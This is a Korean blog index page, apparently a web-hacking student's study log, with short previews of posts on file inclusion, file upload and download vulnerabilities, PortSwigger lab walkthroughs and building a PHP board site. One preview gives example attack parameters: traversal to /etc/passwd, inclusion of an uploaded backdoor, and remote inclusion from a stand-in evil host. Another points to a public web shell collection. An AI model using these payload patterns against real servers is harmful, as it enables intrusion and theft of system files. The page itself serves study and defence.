분류 전체보기241 [10주차] LFI, RFI/ 파일업로드 공격 대응방안/ 파일 다운로드 취약점 ------------------------------------------------------------------------------------------------------------------ fi (file inclusion) > 사용자 입력을 받아서 include include($_GET['url']); **RFI(Remote File Inclusion) : 외부 서버 코드를 불러와서 인클루드. [정의] 원래 개별파일로 페이지를 제작하면 공통적으로 들어가는 양식때 한 항목 부분을 수정하면 나머지 항목들도 수정해야하는 번거로움이 있었다. 그렇지만 include를 사용함으로써 이런 번거로움을 줄일 수 있었는데, Top.php, middle.php, bottom.php로 부분을 나누어 따로 개.. 2021. 12. 22. [복습]파일 업로드 취약점 실습(2) 5. 이미지에 웹쉘을 인코딩해 우회하는 방법을 실습 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload Lab: Remote code execution via polyglot web shell upload | Web Security Academy This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible ... portswigger.. 2021. 12. 16. [10주차] File Inclusion(LFI, RFI) File Iuclusion에서 공격 전 체크할 수 있는 사항으로는 Directory Traversal과 Local File lnclusion, Remote Dile Inclusion이다. Directory Traversal: ?page=../../etc/passwd Local File Inclusion: ?page=../../uploads/my_backdoor.php Remote File Inclusion: ?page=hrrp://evillsite.com/attackserver.php, ?page=http://evilsite.com/XSS.js **윈도우는 역슬래시 리눅스는 / 슬래시이다. RFI(원격 파일 포함, Remote File Inclusion)는 외부 스크립트를 동적으로 참조하는 웹 응용 프로.. 2021. 12. 16. [복습] 파일 업로드 취약점 실습(1) 파일 업로드 취약점 실습 1. 파일 업로드 취약점 아무런 검증이 없는 경우 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload Lab: Remote code execution via web shell upload | Web Security Academy This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's ... portswigger.net (1) php.. 2021. 12. 14. [홈페이지 제작] 게시글 잠금, 댓글 삭제 기능 1. 게시글 잠금 기능 패스워드 입력 페이지 2. 댓글 삭제 기능 비번 입력 화면 입력시 삭제 가능(window open 함수로 제작하고 싶었지만 자식 페이지에 값을 주는 걸 실패해 a href로 대체.) 삭제 화면 -------------------------------------- 잠금 기능을 설정할때 대다수의 페이지들에서 verify 함수가 예시로 나와있는데 나는 따로 해쉬 기능을 설정해주지 않았기 때문에 해당함수를 쓸 수 없었다. 함수를 쓰기 전에 많이 알아볼것! 2021.12.08 - [홈페이지 만들기/PHP] - [홈페이지 제작] 홈페이지 제작 참고 사이트 [홈페이지 제작] 홈페이지 제작 참고 사이트 https://blog.naver.com/bgpoilkj/221375627800 [PHP]게시.. 2021. 12. 12. [9주차] 파일 업로드 취약점 *파일 업로드 - SQL Injectoin - XSS - CSRF - 파일 업로드 다운로드 - 인증/인가 3개월: 웹 해킹 공격 4개월: 모의해킹 프로젝트, 취약점 점검 항목, 보고서 작성 방법, 금취분평(금융 취약점 분석 평가) 5개월: 모의해킹 프로젝트 *파일 업로드 > 악성 스크립트 업로드 서버 측에서 실행 쉘 획득 > 업로드 하는데 실행권한이 있어야한다. > 확장자 필터링이 없는 경우 php 서버 실행 > 악성 파일 업로드(시스템 명령) 실행 > 서버 내부 파일을 삭제하거나 수정, 유출 등 -> 관리자 권한 획득 > 대응방안: 화이트 리스트 기반, 실행권한 제거 + 1. 파일 업로드란? > 공격자가 원하는 임의의 파일을 업로드 할 수 있는 취약점. (모든, 어떤) -- 발생 위치 > 게시판 자료실.. 2021. 12. 10. [홈페이지 제작] 홈페이지 제작 참고 사이트 https://blog.naver.com/bgpoilkj/221375627800 [PHP]게시판 만들기 #12 검색 기능 ※ 2020/05/13 코드 수정 예제파일 http://developtest.org/file/board/181011_board.zip 안녕하세요. S ... blog.naver.com 2021. 12. 8. [9주차]파일 업로드/다운로드 취약점 1. 파일 업로드 공격 **개념 웹 서비스 첨부파일, 환경설정 미흡을 이용하여 악의적인 스크립트가 포함된 파일을 업로드 한 후에 웹 서버에 침투를 하는 공격(첨부, 경로파악, 공격 모두 가능해야함) 공격자는 서버 사이드 스크립트(php, jsp, .net 등)을 이용해서 웹쉘을 제작한다. 웹쉘은 원격에서 웹 서버를 제어하기 위해 만들어졌지만 지금은 웹쉘=악성코드로 분류해서 안티 바이러스에서 탐지한다. 게시판 첨부파일, 이력서 첨부파일, 이미지 첨부파일, 웹 채팅방 파일 공유 기능 등에서 발생 직접 만들어 사용할 수 있으나, https://github.com/tennc/webshell 같은 깃허브에서 쉽게 구할 수 있다. **목적 웹 서버를 통해 데이터 베이스의 정보를 획득. -데이터 베이스에 직접 공격을.. 2021. 12. 8. [홈페이지 제작]파일 업로드, 댓글 기능 파일 업로드 개발 댓글이 없는 경우 댓글이 있는 경우 오늘의 의문점 파일이 업로드된다고 뜨고 Db 저장도 되는데 실 다운로드는 안된다 왜그럴까? 그리고 댓글 삭제하는 기능이 아직 제대로 설정되지 않았다. 원래 idx같은 정보를 GET 방식 URL로 넘겼는데 이번 댓글 삭제같은 경우는 자바 windows open 기능을 사용해서 그런지 URL뒤에 값을 적어 넘기는 게 안돼서 방법을 열심히 찾아보고 있다. input type = hidden 도 안되고 windows 함수 쓸때 자식 페이지로 값을 넘기는 방법도 해봤는데 안된다 어렵다. 그리고 자꾸 div정렬이 안된다. 왜 같은 css 적용하고 다른 곳에서 크게 건든것도 없는데 div 위치가 달라질까? 아 그리고 제일 중요한 게시글 검색 기능을 아직 추가 못했.. 2021. 12. 7. 이전 1 ··· 19 20 21 22 23 24 25 ··· 27 다음